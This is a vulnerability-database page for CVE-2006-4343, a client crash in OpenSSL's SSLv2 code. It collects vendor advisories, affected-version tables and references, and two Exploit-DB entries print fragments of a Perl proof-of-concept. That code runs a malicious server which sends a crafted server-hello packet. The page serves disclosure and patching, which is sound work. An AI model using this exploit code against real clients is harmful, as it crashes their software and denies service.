CVE-2006-4343
published 2006-09-28CVE-2006-4343: The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause…
PriorityP425medium4.3CVSS 2.0
AVNACMAuNCNINAP
EXPLOIT
EPSS
17.42%
96.7th percentile
The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference.
Affected
27 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| debian | debian_linux | — | — |
| debian | openssl | < openssl 0.9.8c-2 (bookworm) | openssl 0.9.8c-2 (bookworm) |
| openssl | openssl | — | — |
| openssl | openssl | — | — |
| openssl | openssl | — | — |
| openssl | openssl | — | — |
| openssl | openssl | — | — |
| openssl | openssl | — | — |
| openssl | openssl | — | — |
| openssl | openssl | — | — |
| openssl | openssl | — | — |
| openssl | openssl | — | — |
| openssl | openssl | — | — |
| openssl | openssl | — | — |
| openssl | openssl | — | — |
| openssl | openssl | — | — |
| openssl | openssl | — | — |
| openssl | openssl | — | — |
| openssl | openssl | >= 0 < 0.9.8c-2 | 0.9.8c-2 |
| openssl | openssl | >= 0 < 0.9.8c-2 | 0.9.8c-2 |
| openssl | openssl | >= 0 < 0.9.8c-2 | 0.9.8c-2 |
| openssl | openssl | >= 0 < 0.9.8c-2 | 0.9.8c-2 |
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:N/A:P
osv4.3MEDIUM
vendor_cisco7.8HIGH
vendor_ubuntu7.8HIGH
vendor_debian4.3MEDIUM
vendor_redhat4.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VMware
Several critical security vulnerabilities have been addressed in the newest releases of VMware's hosted product line
vendor_vmware·2008-03-17·CVSS 6.9
CVE-2006-2937 [MEDIUM] Several critical security vulnerabilities have been addressed in the newest releases of VMware's hosted product line
VMSA-2008-0005: Several critical security vulnerabilities have been addressed in the newest releases of VMware's hosted product line
a. Host to guest shared folder (HGFS) traversal vulnerability On Windows hosts, if you have configured a VMware host to guest shared folder (HGFS), it is possible for a program running in the guest to gain access to the host's file system and create or modify executable files in sensitive locations. NOTE: VMware Server is not affected because it doesn't use host to guest shared folders. No versions of ESX Server, including ESX Server 3i, are affected by this vulnerability. Because ESX Server is based on a bare-metal hypervisor architecture and not a hosted architecture, and it doesn't include any shared folder abilities. Fusion and Linux based hosted product
Cisco
Multiple Vulnerabilities in OpenSSL Library
vendor_cisco·2006-11-08·CVSS 7.8
CVE-2006-4339 [HIGH] Multiple Vulnerabilities in OpenSSL Library
Multiple Vulnerabilities in OpenSSL Library
This is the Cisco PSIRT response to the multiple security advisories published by The OpenSSL Project. The vulnerabilities are as follows:
RSA Signature Forgery (CVE-2006-4339), described in http://www.openssl.org/news/secadv_20060905.txt
ASN.1 Denial of Service Attacks (CVE-2006-2937, CVE-2006-2940), described in http://www.openssl.org/news/secadv_20060928.txt
SSL_get_shared_ciphers() buffer overflow (CVE-2006-3738), also in http://www.openssl.org/news/secadv_20060928.txt
SSLv2 Client Crash (CVE-2006-4343), also in http://www.openssl.org/news/secadv_20060928.txt
As of this publication, there are no workarounds available for any of these vulnerabilities, but it may be possible to mitigate some of the exposure. This Security Response lists the
Ubuntu
openssl vulnerabilities
vendor_ubuntu·2006-09-29·CVSS 7.8
CVE-2006-2937 [HIGH] openssl vulnerabilities
Title: openssl vulnerabilities
Summary: openssl vulnerabilities
Dr. Henson of the OpenSSL core team and Open Network Security
discovered a mishandled error condition in the ASN.1 parser. By
sending specially crafted packet data, a remote attacker could exploit
this to trigger an infinite loop, which would render the service
unusable and consume all available system memory. (CVE-2006-2937)
Certain types of public key could take disproportionate amounts of
time to process. The library now limits the maximum key exponent size
to avoid Denial of Service attacks. (CVE-2006-2940)
Tavis Ormandy and Will Drewry of the Google Security Team discovered a
buffer overflow in the SSL_get_shared_ciphers() function. By sending
specially crafted packets to applications that use this function (like
Exim
BSD
FreeBSD-SA-06:23.openssl: Multiple problems in crypto(3)
bsd_advisories·2006-09-28·CVSS 7.8
CVE-2006-2937 [HIGH] FreeBSD-SA-06:23.openssl: Multiple problems in crypto(3)
FreeBSD-SA-06:23.openssl Security Advisory
The FreeBSD Project
Topic: Multiple problems in crypto(3)
Category: contrib
Module: openssl
Announced: 2006-09-28
Credits: Dr S N Henson, Tavis Ormandy, Will Drewry
Stephen Kiernan (Juniper SIRT)
Affects: All FreeBSD releases.
Corrected: 2006-09-29 13:44:03 UTC (RELENG_6, 6.2-PRERELEASE)
2006-09-29 13:44:31 UTC (RELENG_6_1, 6.1-RELEASE-p9)
2006-09-29 13:44:45 UTC (RELENG_6_0, 6.0-RELEASE-p14)
2006-09-29 13:45:01 UTC (RELENG_5, 5.5-STABLE)
2006-09-29 13:45:43 UTC (RELENG_5_5, 5.5-RELEASE-p7)
2006-09-29 13:45:59 UTC (RELENG_5_4, 5.4-RELEASE-p21)
2006-09-29 13:46:10 UTC (RELENG_5_3, 5.3-RELEASE-p36)
2006-09-29 13:46:23 UTC (RELENG_4, 4.11-STABLE)
2006-09-29 13:46:41 UTC (RELENG_4_11, 4.11-RELEASE-p24)
CVE Name: CVE-2006-2937, CVE-2006-2940, CVE-200
Red Hat
openssl sslv2 client code
vendor_redhat·2006-09-28·CVSS 4.3
CVE-2006-4343 [MEDIUM] openssl sslv2 client code
openssl sslv2 client code
The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference.
Statement: Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
Debian
CVE-2006-4343: openssl - The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0...
vendor_debian·2006·CVSS 4.3
CVE-2006-4343 [MEDIUM] CVE-2006-4343: openssl - The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0...
The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference.
Scope: local
bookworm: resolved (fixed in 0.9.8c-2)
bullseye: resolved (fixed in 0.9.8c-2)
forky: resolved (fixed in 0.9.8c-2)
sid: resolved (fixed in 0.9.8c-2)
trixie: resolved (fixed in 0.9.8c-2)
GHSA
GHSA-vrm9-vqv5-39gr: The get_server_hello function in the SSLv2 client code in OpenSSL 0
ghsa_unreviewed·2022-05-03
CVE-2006-4343 [MEDIUM] CWE-476 GHSA-vrm9-vqv5-39gr: The get_server_hello function in the SSLv2 client code in OpenSSL 0
The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference.
OSV
CVE-2006-4343: The get_server_hello function in the SSLv2 client code in OpenSSL 0
osv·2006-09-28·CVSS 4.3
CVE-2006-4343 [MEDIUM] CVE-2006-4343: The get_server_hello function in the SSLv2 client code in OpenSSL 0
The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference.
No detection rules found.
Exploit-DB
OpenSSL < 0.9.7l/0.9.8d - SSLv2 Client Crash
exploitdb·2007-12-23·CVSS 4.3
CVE-2006-4343 [MEDIUM] OpenSSL < 0.9.7l/0.9.8d - SSLv2 Client Crash
OpenSSL '443', Proto => 'tcp', Listen => 1, Reuse => 1, );
die "Could not create socket: $!\n" unless $sock;
my $TIMEOUT = 0.5;
my $line;
my $new_sock;
srand(time());
while ( $new_sock = $sock->accept() )
{
printf ("new connection\n");
my $rin;
my $line;
my ($nfound, $timeleft) = select($rin, undef, undef, $TIMEOUT) && recv($new_sock, $line, 1024, undef);
my $ciphers = "";
my $ciphers_length = pack('n', length($ciphers));
my $certificate = "";
my $certificate_length = pack('n', length($certificate));
my $packet_sslv2 =
"\x04".
"\x01". # Hit (default 0x01)
"\x00". # No certificate
"\x00\x02".
$certificate_length.
$ciphers_length.
"\x00\x10".
# Certificate
$certificate.
# Done
# Ciphers
$ciphers.
# Done
"\xf5\x61\x1b\xc4\x0b\x34\x1b\x11\x3c\x52\xe9\x93\xd1\xfa\x29\xe9";
my $ssl_lengt
Exploit-DB
OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service
exploitdb·2006-09-28·CVSS 4.3
CVE-2006-4343 [MEDIUM] OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service
OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service
---
source: https://www.securityfocus.com/bid/20246/info
OpenSSL is prone to a denial-of-service vulnerability.
A malicious server could cause a vulnerable client application to crash, effectively denying service.
#!/usr/bin/perl
# Copyright(c) Beyond Security
# Written by Noam Rathaus - based on beSTORM's SSL Server module
# Exploits vulnerability CVE-2006-4343 - where the SSL client can be crashed by special SSL serverhello response
use strict;
use IO::Socket;
my $sock = new IO::Socket::INET ( LocalPort => '443', Proto => 'tcp', Listen => 1, Reuse => 1, );
die "Could not create socket: $!\n" unless $sock;
my $TIMEOUT = 0.5;
my $line;
my $new_sock;
srand(time());
while ( $new_sock = $sock->accept() )
{
printf ("new
Bugzilla
CVE-2006-4343 openssl sslv2 client code
bugzilla·2008-01-29·CVSS 4.3
CVE-2006-4343 [MEDIUM] CVE-2006-4343 openssl sslv2 client code
CVE-2006-4343 openssl sslv2 client code
Common Vulnerabilities and Exposures assigned an identifier CVE-2006-4343 to the following vulnerability:
The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference.
References:
http://www.securityfocus.com/archive/1/archive/1/456546/100/200/threaded
http://www.securityfocus.com/archive/1/archive/1/447318/100/0/threaded
http://www.securityfocus.com/archive/1/archive/1/447393/100/0/threaded
http://lists.grok.org.uk/pipermail/full-disclosure/2006-September/049715.html
http://www.milw0rm.com/exploits/4773
http://www.openssl.org/news/secadv_20060928.txt
http
Bugzilla
CVE-2006-3738 OpenSSL issues (CVE-2006-4343, CVE-2006-2940, CVE-2006-2937, CVE-2006-4339)
bugzilla·2006-10-03·CVSS 7.8
CVE-2006-3738 [HIGH] CVE-2006-3738 OpenSSL issues (CVE-2006-4343, CVE-2006-2940, CVE-2006-2937, CVE-2006-4339)
CVE-2006-3738 OpenSSL issues (CVE-2006-4343, CVE-2006-2940, CVE-2006-2937, CVE-2006-4339)
+++ This bug was initially created as a clone of Bug #206940, Bug #207274,
and Bug #207276 +++
Four CVE issues:
-- Two from Bug #206940
1) Buffer Overflow: Tavis Ormandy and Will Drewry of the Google Security
Team discovered a buffer overflow in SSL_get_shared_ciphers utility
function, used by some applications such as exim and mysql. An attacker
could send a list of ciphers that would overrun a buffer. CVE-2006-3738
2) Denial of Service: Tavis Ormandy and Will Drewry of the Google Security
Team discovered a possible DoS in the sslv2 client code. Where a client
application uses OpenSSL to make a SSLv2 connection to a malicious server
that server could cause the client to crash. CVE-2006-4343
-- O
Bugzilla
CVE-2006-3738 OpenSSL issues (CVE-2006-4343)
bugzilla·2006-09-18·CVSS 10.0
CVE-2006-3738 [CRITICAL] CVE-2006-3738 OpenSSL issues (CVE-2006-4343)
CVE-2006-3738 OpenSSL issues (CVE-2006-4343)
Tavis Ormandy and Will Drewry of the Google Security Team discovered a buffer
overflow in SSL_get_shared_ciphers utility function, used by some
applications such as exim and mysql. An attacker could send a list of
ciphers that would overrun a buffer CVE-2006-3738
Tavis Ormandy and Will Drewry of the Google Security Team discovered a
possible DoS in the sslv2 client code. Where a client application uses
OpenSSL to make a SSLv2 connection to a malicious server that server
could cause the client to crash. CVE-2006-4343
EMBARGO until 20060928
Discussion:
Created attachment 136527
Proposed patch CVE-2006-4343
---
Created attachment 136528
Proposed patch CVE-2006-3738
---
removing embargo, public at http://www.openssl.org/news/secadv_20060928
ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2008-007.txt.ascftp://patches.sgi.com/support/free/security/advisories/20061001-01-P.aschttp://docs.info.apple.com/article.html?artnum=304829http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01118771http://issues.rpath.com/browse/RPL-613http://itrc.hp.com/service/cki/docDisplay.do?docId=c00805100http://itrc.hp.com/service/cki/docDisplay.do?docId=c00849540http://kolab.org/security/kolab-vendor-notice-11.txthttp://lists.apple.com/archives/security-announce/2006/Nov/msg00001.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/2006-September/049715.htmlhttp://lists.vmware.com/pipermail/security-announce/2008/000008.htmlhttp://marc.info/?l=bugtraq&m=130497311408250&w=2http://openbsd.org/errata.html#openssl2http://openvpn.net/changelog.htmlhttp://secunia.com/advisories/22094http://secunia.com/advisories/22116http://secunia.com/advisories/22130http://secunia.com/advisories/22165http://secunia.com/advisories/22166http://secunia.com/advisories/22172http://secunia.com/advisories/22186http://secunia.com/advisories/22193http://secunia.com/advisories/22207http://secunia.com/advisories/22212http://secunia.com/advisories/22216http://secunia.com/advisories/22220http://secunia.com/advisories/22240http://secunia.com/advisories/22259http://secunia.com/advisories/22260http://secunia.com/advisories/22284http://secunia.com/advisories/22298http://secunia.com/advisories/22330http://secunia.com/advisories/22385http://secunia.com/advisories/22460http://secunia.com/advisories/22487http://secunia.com/advisories/22500http://secunia.com/advisories/22544http://secunia.com/advisories/22626http://secunia.com/advisories/22758http://secunia.com/advisories/22772http://secunia.com/advisories/22791http://secunia.com/advisories/22799http://secunia.com/advisories/23038http://secunia.com/advisories/23155http://secunia.com/advisories/23280http://secunia.com/advisories/23309http://secunia.com/advisories/23340http://secunia.com/advisories/23680http://secunia.com/advisories/23794http://secunia.com/advisories/23915http://secunia.com/advisories/24950http://secunia.com/advisories/25420http://secunia.com/advisories/25889http://secunia.com/advisories/26329http://secunia.com/advisories/30124http://secunia.com/advisories/31492http://security.freebsd.org/advisories/FreeBSD-SA-06:23.openssl.aschttp://security.gentoo.org/glsa/glsa-200610-11.xmlhttp://securitytracker.com/id?1016943http://securitytracker.com/id?1017522http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.676946http://sourceforge.net/project/shownotes.php?release_id=461863&group_id=69227http://sunsolve.sun.com/search/document.do?assetkey=1-26-102668-1http://sunsolve.sun.com/search/document.do?assetkey=1-26-102711-1http://sunsolve.sun.com/search/document.do?assetkey=1-66-201531-1http://support.avaya.com/elmodocs2/security/ASA-2006-220.htmhttp://support.avaya.com/elmodocs2/security/ASA-2006-260.htmhttp://www.cisco.com/en/US/products/hw/contnetw/ps4162/tsd_products_security_response09186a008077af1b.htmlhttp://www.cisco.com/warp/public/707/cisco-sr-20061108-openssl.shtmlhttp://www.debian.org/security/2006/dsa-1185http://www.debian.org/security/2006/dsa-1195http://www.gentoo.org/security/en/glsa/glsa-200612-11.xmlhttp://www.ingate.com/relnote-452.phphttp://www.kb.cert.org/vuls/id/386964http://www.mandriva.com/security/advisories?name=MDKSA-2006:172http://www.mandriva.com/security/advisories?name=MDKSA-2006:177http://www.mandriva.com/security/advisories?name=MDKSA-2006:178http://www.novell.com/linux/security/advisories/2006_24_sr.htmlhttp://www.novell.com/linux/security/advisories/2006_58_openssl.htmlhttp://www.openpkg.org/security/advisories/OpenPKG-SA-2006.021-openssl.htmlhttp://www.openssl.org/news/secadv_20060928.txthttp://www.oracle.com/technetwork/topics/security/cpujan2007-101493.htmlhttp://www.osvdb.org/29263http://www.redhat.com/support/errata/RHSA-2006-0695.htmlhttp://www.redhat.com/support/errata/RHSA-2008-0629.htmlhttp://www.securityfocus.com/archive/1/447318/100/0/threadedhttp://www.securityfocus.com/archive/1/447393/100/0/threadedhttp://www.securityfocus.com/archive/1/456546/100/200/threadedhttp://www.securityfocus.com/archive/1/489739/100/0/threadedhttp://www.securityfocus.com/bid/20246http://www.securityfocus.com/bid/22083http://www.securityfocus.com/bid/28276http://www.serv-u.com/releasenotes/http://www.trustix.org/errata/2006/0054http://www.ubuntu.com/usn/usn-353-1http://www.us-cert.gov/cas/techalerts/TA06-333A.htmlhttp://www.vmware.com/security/advisories/VMSA-2008-0005.htmlhttp://www.vmware.com/support/ace2/doc/releasenotes_ace2.htmlhttp://www.vmware.com/support/esx2/doc/esx-202-200612-patch.htmlhttp://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html
+ 162 more references
2006-09-28
Published